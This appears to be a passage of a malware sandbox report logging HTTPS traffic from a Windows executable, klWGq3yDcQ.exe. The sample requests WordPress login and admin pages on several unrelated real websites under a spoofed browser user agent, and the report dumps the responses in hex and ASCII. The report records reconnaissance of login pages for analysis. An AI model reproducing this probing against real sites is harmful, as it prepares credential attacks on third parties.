                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; TIS Offroad &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><script type='text/javascri


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    480192.168.2.452252213.0.13.444436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC184OUTGET /wp/wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: www.ceuandalucia.es
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC542INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 34 2e 34 35 2d 30 2b 64 65 62 37 75 31 34 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 2b 43 6f 6f 6b 69 65 2b 63 68 65 63 6b 3b 20 70 61 74 68 3d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:45 GMTServer: ApacheX-Powered-By: PHP/5.4.45-0+deb7u14Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC6439INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 69 65 38 22 20 6c 61 6e 67 3d 22 65 73 22 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 70 65 6e 67 72 61 70 68 70 72 6f 74 6f 63 6f 6c 2e 6f 72 67 2f 73 63 68 65 6d 61 2f 22 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 32 30 30 38 2f 66 62 6d 6c 22 3e 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 38 29 20 5d 3e 3c 21 2d 2d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if IE 8]><html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="es" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"><![endif]-->...[if !(IE 8) ]>...><html xmlns="http://w


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    481192.168.2.452420172.96.186.2064436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC171OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: samson.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC555INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 50 48 50 2f 37 2e 32 2e 33 34 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 2b 43 6f 6f 6b 69 65 2b 63 68 65 63 6b 3b 20 70 61 74 68 3d 2f 3b 20 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKConnection: closex-powered-by: PHP/7.2.34expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8set-cookie: wordpress_test_cookie=WP+Cookie+check; path=/; s
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC813INData Raw: 32 32 37 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 50 45 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 49 6e 69 63 69 61 72 20 73 65 73 69 c3 b3 6e 20 26 6c 73 61 71 75 6f 3b 20 53 61 6d 73 6f 6e 20 43 6f 6e 74 72 6f 6c 73 20 50 65 72 c3 ba 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 21
                                                                                                                                                                                                    Data Ascii: 2277<!DOCTYPE html><html lang="es-PE"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Iniciar sesin &lsaquo; Samson Controls Per &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><!
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC8018INData Raw: 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 6f 67 69 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 61 6d 73 6f 6e 2e 70 65 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 6f 67 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 53 69 74 65 20 4b 69 74 20 62 79 20 47 6f 6f 67 6c 65 20 31 2e 31 31 34 2e 30 22 20 2f 3e 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 65 66 65 72 72 65 72 27 20 63 6f 6e 74 65 6e 74 3d 27 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 27 20 2f 3e 0a 09 09
                                                                                                                                                                                                    Data Ascii: l='stylesheet' id='login-css' href='https://samson.pe/wp-admin/css/login.min.css?ver=6.4.1' type='text/css' media='all' /><meta name="generator" content="Site Kit by Google 1.114.0" /><meta name='referrer' content='strict-origin-when-cross-origin' />
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    482192.168.2.45233795.168.220.2104436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC299OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                    Host: beachrecruitment.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: k8spersistent=5afd37c218f5676376cb43a26fed2bbc|11f187638643e13d7bd1963991fac52b; OF=8jsqh0b6dova9dpfri4i3ad415
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC371INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 36 20 47 4d 54 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 74 72 61 6e 73 66 65 72 2d 65 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 65 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 70 72 61 67 6d 61 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not Founddate: Sun, 26 Nov 2023 05:59:46 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0pragma:
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC5118INData Raw: 31 33 46 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6e 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 42 65 61 63 68 20 52 65 63 72 75 69 74 6d 65 6e 74 20 42 2e 56 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 4a 61 76 61 73 63 72 69 70 74 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20
                                                                                                                                                                                                    Data Ascii: 13F6<!DOCTYPE html><html lang="nl"><head><title>Beach Recruitment B.V.</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/Javascript"><meta http-equiv="Content-Style-Type"
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC5446INData Raw: 31 35 33 45 0d 0a 6c 65 3d 22 4f 70 64 72 61 63 68 74 67 65 76 65 72 73 22 3e 4f 70 64 72 61 63 68 74 67 65 76 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 76 20 6d 61 69 6e 4c 65 76 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 65 61 63 68 72 65 63 72 75 69 74 6d 65 6e 74 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6d 73 5f 63 61 74 65 67 6f 72 69 65 2f 39 34 36 38 30 2f 62 62 2f 31 2f 69 64 2f 39 34 36 38 30 22 20 74 69 74 6c 65 3d 22 4b 61 6e 64 69 64 61 74 65 6e 22 3e 4b 61 6e 64 69 64 61 74 65 6e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: 153Ele="Opdrachtgevers">Opdrachtgevers</a> </li> <li class="mainLev mainLev"><a href="https://www.beachrecruitment.com/index.php/cms_categorie/94680/bb/1/id/94680" title="Kandidaten">Kandidaten</a>
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC1355INData Raw: 35 34 34 0d 0a 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 21 2d 2d 4c 49 4e 4b 53 2d 2d 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 0a 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 77 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 0a 09 09 3c 64 69 76 20 69 64 3d 22 73 63 72 6f 6c 6c 64 6f 77 6e 22 3e 0a 20 20 20 20 20 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 63 72 6f 6c 6c 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 77 22 3e 0a 20 20 20 20 20 20 20 20 0a
                                                                                                                                                                                                    Data Ascii: 544></div>...LINKS--></div></div><div class="pager"><div class="sw"></div></div><div id="scrolldown"> <div class="icon-scroll"></div> </div></div></header><main> <div class="sw">
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC1617INData Raw: 36 34 41 0d 0a 77 77 2e 62 65 61 63 68 72 65 63 72 75 69 74 6d 65 6e 74 2e 63 6f 6d 2f 5f 69 6d 61 67 65 73 5f 75 70 6c 6f 61 64 2f 5f 74 6e 5f 31 61 33 63 37 65 34 31 39 39 31 36 61 39 65 38 2e 6a 70 67 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 54 65 78 74 22 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 53 75 62 48 65 61 64 65 72 22 3e 56 61 63 61 74 75 72 65 73 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 50 3e 3c 41 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 65 61 63 68 72 65 63 72 75 69 74 6d 65 6e 74 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 2f 70 61 67 65 2f 61 64 76 73 65 61 72 63 68 76 61 63 73 2f 62 62 2f 31 2f 63 6f 6d 6d 61 6e 64 2f 73 74 61 72 74 75 70 72 65 73 75
                                                                                                                                                                                                    Data Ascii: 64Aww.beachrecruitment.com/_images_upload/_tn_1a3c7e419916a9e8.jpg"></div><div class="tText"><div class="tSubHeader">Vacatures</div><P><A href="https://www.beachrecruitment.com/index.php/page/advsearchvacs/bb/1/command/startupresu
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC9542INData Raw: 32 35 33 45 0d 0a 09 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 6f 6f 6b 49 74 65 6d 57 6f 72 64 20 6a 73 6c 4b 65 79 77 6f 72 64 20 6a 73 6c 43 68 61 70 6f 22 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 09 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 73 6c 43 6c 65 61 6e 65 72 20 6a 73 6c 4b 77 43 6c 65 61 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 09 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 6f 6f 6b 49 74 65 6d 43 6f 6e 74 61 69 6e 65 72 20 6a 73 6c 49 74 65 6d 43 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 6f 6f 6b 49 74 65 6d 54 69 74 6c 65 20 6a 73 6c 46 75 6e 63 74 69 6f 6e 4e 61 6d 65 22 3e 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 65 61 63 68 72 65 63 72 75
                                                                                                                                                                                                    Data Ascii: 253E<div class="hookItemWord jslKeyword jslChapo"></div><div class="jslCleaner jslKwCleaner"></div></div><div class="hookItemContainer jslItemContainer"><div class="hookItemTitle jslFunctionName"><a href="https://www.beachrecru
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC3757INData Raw: 45 41 36 0d 0a 76 20 63 6c 61 73 73 3d 22 74 35 6f 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 54 69 74 6c 65 22 3e 4f 76 65 72 20 6f 6e 73 3c 2f 64 69 76 3e 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 49 6e 74 72 6f 22 3e 42 65 61 63 68 20 52 65 63 72 75 69 74 6d 65 6e 74 20 69 73 20 67 65 73 70 65 63 69 61 6c 69 73 65 65 72 64 20 69 6e 20 64 65 20 66 6f 6f 64 62 72 61 6e 63 68 65 20 65 6e 26 6e 62 73 70 3b 68 65 65 66 74 26 6e 62 73 70 3b 65 65 6e 20 62 72 65 64 65 20 65 72 76 61 72 69 6e 67 20 6d 65 74 20 61 6c 6c 65 20 72 65 6c 65 76 61 6e 74 65 20 66 75 6e 63 74 69 65 73 20 6f 70 20 48 42 4f 2d 20 65 6e 20 57 4f 2d 6e 69 76 65 61 75 2e 3c 2f 64 69 76 3e 0a 09 09 09 3c 21 2d 2d 49 4e 54 52 4f 4c 49 4e 4b 53 2d 2d 3e 0a 09 09
                                                                                                                                                                                                    Data Ascii: EA6v class="t5o"><div class="tTitle">Over ons</div><div class="tIntro">Beach Recruitment is gespecialiseerd in de foodbranche en&nbsp;heeft&nbsp;een brede ervaring met alle relevante functies op HBO- en WO-niveau.</div>...INTROLINKS-->
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    483192.168.2.452426172.67.132.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC168OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: esoft.academy
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC632INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privateCF-Cache-Status: DYNAMICReport-To: {"endpoints":
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC737INData Raw: 37 64 33 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 69 6e 69 74 3d 7b 61 6a 61 78 3a 7b 64 65 6e 79 5f 6c 69 73 74 3a 5b 22 62 61 6d 2e 65 75 30 31 2e 6e 72 2d 64 61 74 61 2e 6e 65 74 22 5d 7d 7d 3b 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 6c 6f 61 64 65 72 5f 63 6f 6e 66 69 67 3d 7b 6c 69 63 65 6e 73 65 4b 65 79 3a 22 4e 52 4a 53 2d 38 39 33 62 34 33 36 63 64
                                                                                                                                                                                                    Data Ascii: 7d37<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"><script type="text/javascript">(window.NREUM||(NREUM={})).init={ajax:{deny_list:["bam.eu01.nr-data.net"]}};(window.NREUM||(NREUM={})).loader_config={licenseKey:"NRJS-893b436cd
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC1369INData Raw: 64 20 30 2c 70 72 6f 64 75 63 74 3a 76 6f 69 64 20 30 2c 65 78 74 72 61 3a 76 6f 69 64 20 30 2c 6a 73 41 74 74 72 69 62 75 74 65 73 3a 7b 7d 2c 75 73 65 72 41 74 74 72 69 62 75 74 65 73 3a 76 6f 69 64 20 30 2c 61 74 74 73 3a 76 6f 69 64 20 30 2c 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 3a 76 6f 69 64 20 30 2c 74 4e 61 6d 65 50 6c 61 69 6e 3a 76 6f 69 64 20 30 7d 2c 6f 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 69 6e 66 6f 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 69 66 28 21 6f 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 49 6e 66 6f 20 66 6f 72 20 22 2e 63 6f 6e 63
                                                                                                                                                                                                    Data Ascii: d 0,product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},o={};function s(e){if(!e)throw new Error("All info objects require an agent identifier!");if(!o[e])throw new Error("Info for ".conc
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC1369INData Raw: 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 65 76 65 6e 74 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 74 69 6d 69 6e 67 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 6c 6f 6e 67 5f 74 61 73 6b 3a 21 31 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 73 65 73 73 69 6f 6e 5f 74 72 61 63 65 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 31 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 68 61 72 76 65 73 74 3a 7b 74 6f 6f 4d 61 6e 79 52 65 71 75 65 73 74 73 44 65 6c 61 79 3a 36 30 7d 2c 73 65 73 73
                                                                                                                                                                                                    Data Ascii: arvestTimeSeconds:30,autoStart:!0},page_view_event:{enabled:!0,autoStart:!0},page_view_timing:{enabled:!0,harvestTimeSeconds:30,long_task:!1,autoStart:!0},session_trace:{enabled:!0,harvestTimeSeconds:10,autoStart:!0},harvest:{tooManyRequestsDelay:60},sess
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC1369INData Raw: 67 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 67 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 67 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 66 28 29 29 3b 63 6f 6e 73 74 20 6e 3d 28 30 2c 72 2e 65 6b 29 28 65 29 3b 6e 26 26 28 6e 2e 69 6e 69 74 3d 67 5b 65 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 76 61 72 20 6e 3d 68 28 65 29 3b 69 66 28 6e 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 73 70 6c 69 74
                                                                                                                                                                                                    Data Ascii: g[e])throw new Error("Configuration for ".concat(e," was never set"));return g[e]}function v(e,t){if(!e)throw new Error(p);g[e]=(0,i.D)(t,f());const n=(0,r.ek)(e);n&&(n.init=g[e])}function m(e,t){if(!e)throw new Error(p);var n=h(e);if(n){for(var r=t.split
